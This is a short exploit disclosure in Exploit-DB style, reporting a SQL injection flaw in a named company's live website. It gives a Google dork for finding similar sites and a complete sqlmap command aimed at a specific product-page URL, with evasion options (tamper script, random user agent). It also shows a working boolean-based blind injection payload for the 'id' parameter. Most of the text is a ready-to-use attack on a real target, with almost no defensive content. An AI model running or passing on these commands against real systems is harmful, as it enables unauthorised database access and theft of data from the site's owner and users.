**************************** #Exploit Title: picassoremedies - SQL Injection vulnerability #Date: 2024-07-05 #Exploit Author: Mahdi Karimi #Vendor Homepage: https://picassoremedies.in #Google Dork: "Powered by picassoremedies" #Tested On: Kali Linux sqlmap: python sqlmap.py -u "https://picassoremedies.in/product-detail.php?id=137" --level=5 --risk=3 tamper=space2comment --random-agent Testing Method; - boolean-based blind Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=137' AND 1647=1647-- dWxa ************************************************** #Discovered by: Mahdi Karimi #Email : [email protected] **************************************************